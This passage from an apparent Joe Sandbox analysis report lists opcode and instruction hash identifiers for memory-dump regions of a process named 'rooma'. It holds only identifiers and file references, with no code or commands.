                                                            • Opcode Fuzzy Hash: f4703d4c27f205f13c42fa8a6b9400a99adffb13358110fccba107571c3c52ff
                                                            • Instruction Fuzzy Hash: 79115A7054122AABEF75AB68CD52FEDB2B4BF44714F5041D4A318AA0E0DA709E85CF85
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                            • Instruction ID: 72025ccc691f7d8ea476506068ff067f2b97143a58f9cc6de9fa1d3f5a44a081
                                                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                            • Instruction Fuzzy Hash: 86014733601211ABEF159E6DD884B9AB7ABBFC4700F5544AAED058F246EE71CC81C391
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                            • Instruction ID: 8c878b7419840832ebbbfcd784b3c763320543ef879aba43c4fa0da816c5fecc
                                                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                            • Instruction Fuzzy Hash: A201B532500706DFEB26AAAAC844AABB7F9FFC5654F04481EA9469F540DE70E402CB60
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89988964bc0b45ce7560111d819aac2cf4460dcf729f11cb26d55cdec001ec8b
                                                            • Instruction ID: 37816373825f99689badd9dd585113fdf17ff4cdf775bbac5802cca35bc6565b
                                                            • Opcode Fuzzy Hash: 89988964bc0b45ce7560111d819aac2cf4460dcf729f11cb26d55cdec001ec8b
                                                            • Instruction Fuzzy Hash: 28112D75A0120DEBDB15DFA8CC51AAE7BB5FB84694F008099E9059B290D635AE11CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1223bf0b7514b4a468b24a5616c7e7b391f4e628b251cb49fee31c620ae50988
                                                            • Instruction ID: 6d28502f2679fd6c62591fc5a90d87c1d8f1ab26f535678d45e01fa96907892e
                                                            • Opcode Fuzzy Hash: 1223bf0b7514b4a468b24a5616c7e7b391f4e628b251cb49fee31c620ae50988
                                                            • Instruction Fuzzy Hash: 1D0184B1691902BFD251BB69CD81E5BBBECFF99654B400629B1098BA51DB24EC01C6A0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                            • Instruction ID: cec631084a6d3e6e0dafa6385f6a7cca3da1e0c7a64f182f36c4b398c851e22e
                                                            • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                            • Instruction Fuzzy Hash: 4511A532910B02DFD732AF15C880B25B7E5FF90766F15886CD4895E495C774E880CB50
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                            • Instruction ID: 5b3c79202dec5dc5a40fb1b8eca21cfc2586783962067476e2fb9bce3aff1ed6
                                                            • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                            • Instruction Fuzzy Hash: 4101D472A005459FD716DED8E800B6A77BABBC4A34F10812DFA15CF281DB34D941C7D5
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                            • Instruction ID: 239f22bae8c28e3513968b1e089e2d7ee884fe6d7f58117107a0aec298276600
                                                            • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                            • Instruction Fuzzy Hash: 5F01D176300106ABCB529EAACC84EDF7EACBF84A50B144469BA05EF120EA34D942C770
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4458f63a51635622f4c65760cb13ee04e76b45b335e11f7cc6950d5f3ab93323
                                                            • Instruction ID: 04cb540fdecdeb176cea24c59c8fe696a0064f7325c91b6b945b0cf43339702b
                                                            • Opcode Fuzzy Hash: 4458f63a51635622f4c65760cb13ee04e76b45b335e11f7cc6950d5f3ab93323
                                                            • Instruction Fuzzy Hash: 81015E71A00259EBDB14EFADD845FAEBBB8FF84704F404066B900EB290D674DA01CB95
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66191f476442dbb728ade59d8aec8747ebe613f54520a8fcfc7a96d973af6a8c
                                                            • Instruction ID: a71a7462952156f55fb08edc0b66191265f138a6432c88fa0d074f2b2f1f2ffe
                                                            • Opcode Fuzzy Hash: 66191f476442dbb728ade59d8aec8747ebe613f54520a8fcfc7a96d973af6a8c
                                                            • Instruction Fuzzy Hash: 53019E71A00249ABCB14EFADD845FAEBBB8FF84310F004066B900EB381DA74DA01CB94
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                            • Instruction ID: a3a7aa74c07b9d7af6f05b577064662136f123f6360b54473625999e5cbb022a
                                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                            • Instruction Fuzzy Hash: B9017832680681DFE326861DC948F2EBBE8FB88794F4904A1FA05CF6A1D678DC40C661
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50154aa9374597af48b230b89c7c624d5e918e43f43f83987a66e9a259c60465
                                                            • Instruction ID: 6cc030d491305e450f8b05f5bb72dabfaa3385787f30fbe58d59d3b01a98685d
                                                            • Opcode Fuzzy Hash: 50154aa9374597af48b230b89c7c624d5e918e43f43f83987a66e9a259c60465
                                                            • Instruction Fuzzy Hash: 6D018431700A09DBDB14FB69DC149AE77E9FF81610B594169DA02BF644EE20DD01C794
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 45aebe0a22676018436e3d639ca7c6569e4fcae3e3df460c5cf2e9daed37f439
                                                            • Instruction ID: 8b42131bb30f9143a5a460d74643f1cdb84c0aa723a7068d957b695d061267b7
                                                            • Opcode Fuzzy Hash: 45aebe0a22676018436e3d639ca7c6569e4fcae3e3df460c5cf2e9daed37f439
                                                            • Instruction Fuzzy Hash: 68018F71A00259EBDB10EBA9D805FAFBBB8FF94704F004066B900EB380D6B4D901C794
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c5627a8807f7a18b5f5d39fe5a6447a6c7c13f77749067a136d8055bf3c80c33
                                                            • Instruction ID: 44492d2ceaf5e4fe2fd048af4741ce7187c71b1960e4ba66756c8eb646af87c0
                                                            • Opcode Fuzzy Hash: c5627a8807f7a18b5f5d39fe5a6447a6c7c13f77749067a136d8055bf3c80c33
                                                            • Instruction Fuzzy Hash: 83F0A932A41711BBC731DB568D50F5BBEA9FFC4B90F154429A6059F640DA30DD01C6A1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 374cd651787e06aca9d867f8f6ad02f3026d8124cf7dc1c87b03c316acb4fd8e
                                                            • Instruction ID: 373bd460ab59d6f67126aa1439cc5fe1674869748b1641c0d3d6fc84d81cfbe6
                                                            • Opcode Fuzzy Hash: 374cd651787e06aca9d867f8f6ad02f3026d8124cf7dc1c87b03c316acb4fd8e
                                                            • Instruction Fuzzy Hash: E20121B1A1020DEBDB00DFA9D9459DEBBF8FF98344F10405AE901E7350D7749A018BA4
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cacab198a420e6d92aeba4513b6a2227adf92fd040db857ee4c0dd92e835e2a5
                                                            • Instruction ID: 46ebe69ae4e36824a4eb0ca62409555f78000edce889b462ff28a4aabb1f6269
                                                            • Opcode Fuzzy Hash: cacab198a420e6d92aeba4513b6a2227adf92fd040db857ee4c0dd92e835e2a5
                                                            • Instruction Fuzzy Hash: 4D0121B1A10209EBCB04DFA9D9459EEBBF8FF58344F10405AF901EB351D674E901CBA5
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                            • Instruction ID: ec5709b8e8d06f22214f30a710943d5235413cc96c4b33a7a736e5ecfbc925c8
                                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                            • Instruction Fuzzy Hash: 9DF062B2600615ABD334CF4DDC40E5BFBEAEBD5A90F058169A655DB220EA31ED05CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a7ea4e3876ea1a6b3b187b4d960b43da93b91a1f1fd123bc61850dfe68e8439
                                                            • Instruction ID: 964aec4497799fdd917ee7530de67180600ea6a15b956d6ab513cb43978b3168
                                                            • Opcode Fuzzy Hash: 5a7ea4e3876ea1a6b3b187b4d960b43da93b91a1f1fd123bc61850dfe68e8439
                                                            • Instruction Fuzzy Hash: 9F012CB1A0020AEBDB00DFA9D9459EEBBF8FF59344F50405AE901FB390D674A9018BA4
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                            • Instruction ID: 47b808f967b7de3f08240f374ba88e28acbe6445d1a4b40ea57335f3e7e289f4
                                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                            • Instruction Fuzzy Hash: 49F0FC73244623ABD73236598840BAFB9D5BFE1A64F1A0035E205BF240CD648D0396F0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 28b15c0813f80b2b810a916261db29761061ba9b2f4c8c3bd6a6e5b2c673459e
                                                            • Instruction ID: c80d529b10910e15eb33e4bbca7498656898b2e01d016c62fad75aa2f46d06e0
                                                            • Opcode Fuzzy Hash: 28b15c0813f80b2b810a916261db29761061ba9b2f4c8c3bd6a6e5b2c673459e
                                                            • Instruction Fuzzy Hash: 81111BB0A1024ADFDB44DFA9D945BADFBF4BF48300F04426AE509EB382E634D941CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec80a384fa4aaab53625206126903fb741f8e2e4df626ace2bd5daf22848a6f1
                                                            • Instruction ID: 966dd5d5ac826c09ba6a55dba2f2a1430372830a4ba0bf20db5be4207e41a811
                                                            • Opcode Fuzzy Hash: ec80a384fa4aaab53625206126903fb741f8e2e4df626ace2bd5daf22848a6f1
                                                            • Instruction Fuzzy Hash: 5E014F71A0024AEBDB14DFA9E845AEEBBF8BF58314F14405AE501BB390D774EA01CB95
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d17135530fa3b09127ee58654a30fd213a4f806388a917e9abb5b8832034f022
                                                            • Instruction ID: b4d9a2f45adcae5491d4249f51aa8e7dd7027cffe8bf1a1e4aadcaa6c01fb6f3
                                                            • Opcode Fuzzy Hash: d17135530fa3b09127ee58654a30fd213a4f806388a917e9abb5b8832034f022
                                                            • Instruction Fuzzy Hash: 15F06872B10249EBD715DFBDD805AEEB7B8FF54710F0080A6E511EB290DA75D9018791
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                            • Instruction ID: 5667a8ce8d90830d82b07740ef5d8fde6b4ccd3385ef1290e0e7e8f3a23d6a21
                                                            • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                            • Instruction Fuzzy Hash: 7EF0FC75A016566FEB20DFDC8940FAE7BAABFD8A20F044559B9019F540D730DD40CB90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eea92a17f872b10cce13c26eb580bb3f63d335f1f7dafb6c3244fc3f10383c36
                                                            • Instruction ID: 14c5b314d34cdd41e0af1a91eaece8d08b773bd5f13592661311feee7b91f8db
                                                            • Opcode Fuzzy Hash: eea92a17f872b10cce13c26eb580bb3f63d335f1f7dafb6c3244fc3f10383c36
                                                            • Instruction Fuzzy Hash: 17018936105149EBCF129E94DC40EDE7F66FB4C754F098205FE1966224C736D971EB81
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 17d3c91de0edac1a8945bebf03e70381161d84a9a480369144bab9a83bc1f1ec
                                                            • Instruction ID: a5a6e15789e29eddcf7423360b0723a4b3ec04de62c4fbf73df7568bac72b3e7
                                                            • Opcode Fuzzy Hash: 17d3c91de0edac1a8945bebf03e70381161d84a9a480369144bab9a83bc1f1ec
                                                            • Instruction Fuzzy Hash: A8F024716142425BF714B6299C81BA332DAF7E4754F25846AEB099F2C1E970DC0183F4
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a26da1787b2dbecff18b6649dc9c785c05ddca6dd8e54f5bfa60fb88fd91af1
                                                            • Instruction ID: 88300873229129adc3d49b99ec30a0671ed020704e10a681c0bd04f1801290af
                                                            • Opcode Fuzzy Hash: 0a26da1787b2dbecff18b6649dc9c785c05ddca6dd8e54f5bfa60fb88fd91af1
                                                            • Instruction Fuzzy Hash: FD0171B0E0120ADFDB44DFA9C445B9EF7F4FF08300F0082A5A519EB381E6349A008B90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c71df7c926db4e626c18f06ce154917c9cd0163fc5111427db1a1d604929e96
                                                            • Instruction ID: bd4793aba174694b5354ea48b8f623765206a07d90f5be9a2959a0905b55ea6a
                                                            • Opcode Fuzzy Hash: 5c71df7c926db4e626c18f06ce154917c9cd0163fc5111427db1a1d604929e96
                                                            • Instruction Fuzzy Hash: 3701A470240682DFF3379FACCD48B2A77E4BB54F44F980598BA018F7DADB68D5018614
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                            • Instruction ID: 9e8200905a20c2269d5b47346d29558f5b820e4f1fbe1e005126a7d14914af1b
                                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                            • Instruction Fuzzy Hash: DDF0E231B81A234BFB36AA2F8C20B2EEA96AFD0E40B05052C9611CB780DF20DC018780
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 90c029a24580095e49cbc633dda196b95f21d9479f4b3337759e9ed6a0bfb230
                                                            • Instruction ID: 601fa98f8e3f7abf4d6475b0d8415bfbd7b63690a01ac42ac96b92a85564c068
                                                            • Opcode Fuzzy Hash: 90c029a24580095e49cbc633dda196b95f21d9479f4b3337759e9ed6a0bfb230
                                                            • Instruction Fuzzy Hash: A9F04F71A01249EFCB44EFADD945A9EBBF4FF58300F408069B945EB391EA74DA01CB54
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89381c882c8c3fb99ea163f142f78bf996aaa7467c34ae8c613f31c737863223
                                                            • Instruction ID: 66f41f6f8bdd7acaf70a954e547d646956c758ba03e726810666cdf8ba9d18fc
                                                            • Opcode Fuzzy Hash: 89381c882c8c3fb99ea163f142f78bf996aaa7467c34ae8c613f31c737863223
                                                            • Instruction Fuzzy Hash: 52F0FA32200240BFD731AB49DC04FAEBBEDEFD4B08F08011CA542A7490CAA0A908C660
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 237a983cb795b40e1e0facc928c4211c7a80080b73d654176f27d111499cdaae
                                                            • Instruction ID: 6c08ef9da2e7f585ea313650b9fb22b43fdcef377a0ce34272e8e5e5b9e90a20
                                                            • Opcode Fuzzy Hash: 237a983cb795b40e1e0facc928c4211c7a80080b73d654176f27d111499cdaae
                                                            • Instruction Fuzzy Hash: F6F0AFB0A0020AEFCB00EFA8D945A9EBBF4FF58300F108069B805EB390E674DA00CB54
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7643b1d28d5f24657e633881b2a2c7b4598c12dc3a321119a55b38679a8f06d1
                                                            • Instruction ID: 88cf8269244027ba295e7cc29f4b521745a5d63e39bb536dec4c9e5fcb2b58cd
                                                            • Opcode Fuzzy Hash: 7643b1d28d5f24657e633881b2a2c7b4598c12dc3a321119a55b38679a8f06d1
                                                            • Instruction Fuzzy Hash: EDF027264156C12BCF726B6CEC503D53B56A752214F0A2189DDA05B305C674C493C3AA
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50113d6fe7a49449482ce1de8e4ec0d6219499f1b756378331db81d5b801cbf9
                                                            • Instruction ID: bef2beb87bdd1babb9734fba467c11c0ecc286aa0358fcbf2c46775da9fc648a
                                                            • Opcode Fuzzy Hash: 50113d6fe7a49449482ce1de8e4ec0d6219499f1b756378331db81d5b801cbf9
                                                            • Instruction Fuzzy Hash: B6F0B470A1024DEFD704EBB8D845A5DB7B8BF54704F108054E502EB290EA74D9018B14
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e1e45f162d127acecaa2417b75db0a04c1aa1d56aa92ea20e020e0cb3d675a9
                                                            • Instruction ID: 9be7f8a67b5d77614c6aa075740e500c9e67bbfaddfc7e44136d6e7afab16ed2
                                                            • Opcode Fuzzy Hash: 3e1e45f162d127acecaa2417b75db0a04c1aa1d56aa92ea20e020e0cb3d675a9
                                                            • Instruction Fuzzy Hash: 9CF0E270A1024AEFDB14EFB9E906E6EB7F8FF54704F404068A901EB390EA74D900CB54
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3132c2c31ca2714e325348b67f1f82ed42496293e9b1a101d916e8e05f5022ea
                                                            • Instruction ID: 675d59d3fd93a36656e27847e863e3e03b2ffaa564a41eb0b93759c541be480b
                                                            • Opcode Fuzzy Hash: 3132c2c31ca2714e325348b67f1f82ed42496293e9b1a101d916e8e05f5022ea
                                                            • Instruction Fuzzy Hash: 78F0B470A1020AEBD714EBA8D905A6EB7F8BF54304F408458B501EB391EB34D9008754
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 823675eb2c2e550174d758043ca7b5b285f0e76b37ab28020a5468ea3dfb912a
                                                            • Instruction ID: 49d4c569dc1c99abe9edc6e3c43eb6d76c82b8f227f68ad005c634f0bb3a0ae4
                                                            • Opcode Fuzzy Hash: 823675eb2c2e550174d758043ca7b5b285f0e76b37ab28020a5468ea3dfb912a
                                                            • Instruction Fuzzy Hash: A2F0E2725116919FE7229FACC388B297BD8BB40FA0F0CA82DD40ECF512C660E8C0CA50
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7873bbfc64c78980d674a93fc2813bfeff83b099c2db0186601ea1456d5505b6
                                                            • Instruction ID: 360c75be0153704b8b3b54bc7ed941817f207b7d09fe96f5c9db22abe2a0b49a
                                                            • Opcode Fuzzy Hash: 7873bbfc64c78980d674a93fc2813bfeff83b099c2db0186601ea1456d5505b6
